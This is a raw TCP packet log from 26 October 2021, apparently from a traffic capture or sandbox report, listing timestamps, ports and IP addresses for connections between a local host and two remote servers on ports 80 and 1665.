Oct 26, 2021 14:32:28.564886093 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564889908 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564908981 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564919949 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564934969 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564944983 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564979076 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.565028906 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585644007 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585684061 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585707903 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585728884 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585753918 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585777044 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585798979 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585805893 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585820913 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585834026 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585839987 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585843086 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585844040 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585851908 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585865974 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585886955 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585889101 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585900068 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585911036 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585916042 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585936069 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585956097 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.585963011 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585978985 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.585997105 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586007118 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586014986 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586019993 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586035967 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586036921 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586051941 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586055994 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586067915 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586071968 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586087942 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586088896 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586107016 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586108923 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586123943 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586123943 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586143017 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586144924 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586162090 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586163044 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586184025 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586190939 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586199045 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586210012 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586231947 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586237907 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586247921 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586255074 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586262941 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586273909 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586292028 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586302996 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586313009 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586314917 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586333036 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586335897 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586344004 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586350918 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586363077 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586373091 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586383104 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586390972 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586411953 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586420059 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586431026 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586436033 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586448908 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586456060 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586467981 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586472034 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586486101 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586487055 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586503983 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586503983 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586520910 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586522102 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586540937 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586541891 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586558104 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586560011 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586575985 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586576939 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586597919 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586599112 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586611986 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586626053 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586627960 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586647034 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586664915 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586667061 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586683035 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586683035 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586700916 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586708069 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586719990 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586725950 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586747885 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586750031 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586760998 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586769104 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586779118 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586787939 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586807013 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586807966 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586822033 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586829901 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586838007 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586853027 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586868048 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586873055 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586889029 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586889982 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586911917 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586913109 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586925983 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586930037 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586944103 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586951017 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586962938 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586968899 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.586977959 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.586991072 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.587007999 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.587007999 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.587023973 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.587039948 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590387106 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590419054 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590440035 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590459108 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590475082 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590492010 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590502977 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590508938 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590524912 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590528965 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590533018 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590542078 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590543032 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590558052 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590558052 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590578079 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590579033 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590594053 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590598106 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590615988 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590632915 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590737104 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590754986 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590771914 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590789080 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590794086 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590806007 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590814114 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590821981 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590826988 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590838909 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590841055 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590861082 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590866089 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590883017 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590887070 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590895891 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590905905 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590924025 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590931892 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590941906 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590945005 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590959072 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590960979 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590974092 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590981007 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.590991020 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.590996981 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591008902 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591013908 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591029882 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591031075 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591048956 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591052055 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591065884 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591074944 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591084957 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591089010 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591101885 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591109991 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591133118 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591137886 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591137886 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591156006 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591171980 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591185093 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591190100 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591200113 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591213942 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591228008 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591243982 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591252089 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591262102 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591264963 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591279030 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591289997 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591295958 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591300964 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591319084 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591320038 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591336966 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591340065 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591353893 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591353893 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591368914 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.591371059 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591389894 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.591408014 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.595493078 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.596348047 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:29.414046049 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:46.367887974 CEST	49166	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:46.657948971 CEST	1665	49166	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:46.658149958 CEST	49166	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:46.751389027 CEST	49166	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:47.053869963 CEST	1665	49166	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:47.053934097 CEST	49166	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:47.345952034 CEST	1665	49166	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:47.346102953 CEST	49166	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:47.464735985 CEST	49166	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:47.635787964 CEST	1665	49166	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:47.635874987 CEST	49166	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:51.557111979 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:51.851305962 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:51.851470947 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:51.857033968 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:52.164453030 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:52.164664984 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:52.512219906 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:52.512319088 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:52.806782961 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:52.806878090 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.154273987 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.154655933 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.504658937 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.504813910 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.505477905 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.505649090 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.505692005 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.506028891 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.506309986 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.506352901 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.673413038 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.799855947 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.800026894 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.800236940 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.800323963 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.800554037 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.800605059 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.800757885 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.800811052 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.802412987 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.802580118 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.803714037 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.803738117 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.803752899 CEST	1665	49167	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:53.803859949 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.803874016 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:53.803877115 CEST	49167	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:57.754728079 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:58.058339119 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:58.061402082 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:58.064655066 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:58.397031069 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:58.399315119 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:58.754117012 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:58.754252911 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:59.053621054 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:59.106976032 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:59.467252016 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:59.467335939 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:59.824712992 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:59.824749947 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:59.824774981 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:59.825572014 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:32:59.825630903 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:32:59.826642990 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.053023100 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.121845961 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.121964931 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.122488976 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.128318071 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.128388882 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.128427029 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.128427982 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.128462076 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.128463030 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.349483013 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.350234032 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.351608992 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.351722956 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.420648098 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.422082901 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.422255993 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.426784039 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.428517103 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.428668022 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.430152893 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.432133913 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.432260036 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.433902979 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.435918093 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.435964108 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.435987949 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.436049938 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.645926952 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.647989988 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.648032904 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.648159027 CEST	49168	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:33:00.649274111 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.649308920 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.649336100 CEST	1665	49168	103.133.109.121	192.168.2.22
Oct 26, 2021 14:33:00.649359941 CEST	1665	49168	103.133.109.121	192.168.2.22
